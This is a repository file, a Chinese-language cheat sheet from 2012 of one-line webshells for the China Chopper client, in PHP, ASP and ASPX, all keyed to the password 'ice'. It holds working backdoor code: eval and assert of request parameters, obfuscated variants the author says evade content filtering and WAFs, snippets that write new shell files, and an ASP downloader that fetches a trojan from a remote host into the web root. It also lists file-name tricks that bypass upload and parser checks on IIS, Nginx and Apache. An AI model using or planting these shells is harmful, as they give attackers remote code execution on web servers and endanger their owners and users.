webshell/caidao-shell/说明.log

86 lines
No EOL
2.5 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

GIF89a 图片头
[+]---------------------------------PHP---------------------------------[+]
<?php @eval($_POST['ice']);?>
<?php header('status:404');${${eval($_POST[ice])}};?>
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
// 同目录生成 ice.php
[+]---------------------------------PHP---------------------------------[+]
***************************************************************************
[+]---------------------------------ASP---------------------------------[+]
<%eval request("ice")%>
<%www=REquEst("ice"):EvaL(www)%>
<%
Dim ConKey:ConKey="ice"
Dim InValue:InValue=Request(ConKey)
eval(InValue)
%>
<%E=request("ice") execute E%>
<%
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xxx.com/shell.txt",0 'asp木马文本格式地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "E:\WWWROOT\xxx.asp",2
%>
┼攠數畣整爠煥敵瑳∨≡┩愾 // ANSI—>Unicode ,密码: a
┼攠數畣整爠煥敵瑳∨捩≥┩愾 //密码 ice
上传一个图片一句话(xxx.jpg)。再上传一个.asp文件去包含: <!--#include file="xxx.jpg" -->
[+]---------------------------------ASP---------------------------------[+]
***************************************************************************
[+]---------------------------------ASPX---------------------------------[+]
<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
[+]---------------------------------ASPX---------------------------------[+]
IIS 6.0 解析: x.asp/x.jpg x.asp;x.jpg ;如果遇到安全狗,畸形会被拦截,可以尝试将一句话的文件名改为 ;x.asp;x.jpg (IIS 7.5 可以试试 a.aspx.a;.a.aspx.jpg..jpg 这样的)
Nginx 解析: x.jpg/.php x.jpg%00.php
Apache : x.php.x
xx.jpg.jsp,xx.png.jsp
以上为 php、asp、aspx一句话木马的客户端密码均为 ice 。这是一句话的几种写法,有些可以逃过内容审查
-- 冰锋刺客 --
2012-07-21